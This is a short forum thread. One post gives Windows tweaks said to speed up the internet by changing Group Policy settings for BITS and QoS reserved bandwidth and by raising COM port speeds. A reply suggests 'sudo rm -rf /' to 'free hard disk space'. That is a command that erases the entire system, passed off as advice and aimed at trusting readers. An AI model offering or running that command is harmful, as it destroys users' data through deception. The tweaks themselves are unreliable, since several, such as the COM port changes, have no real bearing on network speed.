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October 14, 2014, 02:42:51 PM
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No installation of  application and other third party softwares. You can do it manually.


Disable all internet connection first..


1st Tweaks:


Click start or press Windos+R then type GPEDIT.msc
To access Group Police menu,


1.Select Local Computer Policy
2.Then Computer Configuration
3.Select Administrative Templates
4.Select Network
5.Select Background Intelligent Transfer Service
6.Then Maximum Network Bandwidth That BITS Users
7.Click Enable

SECTION PROPERTIES:
Limits BITS Transfer Rate (KBPS) To: 0
FROM: 12AM
TO: 12AM
CHECK: use all available unused Bandwidth or
Limit BITS transfer rate(KBPS) TO: 0

8.Click APPLY then OK
9. Go Back to Network Menu
 10.Now Select QoS Packet Scheduler
11.Select Limit Reserve Bandwidth
12.Click Enable
13.Bandwidth Limit (%): 0
12.Click Apply then OK
14.Exit Group Policy


2nd Tweaks:


1.Go to administrative tools > Computer Management > Device Manager
2.Select PORTS (COM & LPT)
3.Right click Communication Ports and select Properties
4.Now select PORT SETTINGS
5.Set BITS PER SECOND to maximum available (mine is 128000)
6.Press Ok
7. IF you would see other COmmunication Ports, Do the same procedure. Do not bother the printer port.

Thanks for reading. Comment if working. thanks
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October 14, 2014, 11:25:24 PM
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sudo rm -rf / can help you to free hard disk space.
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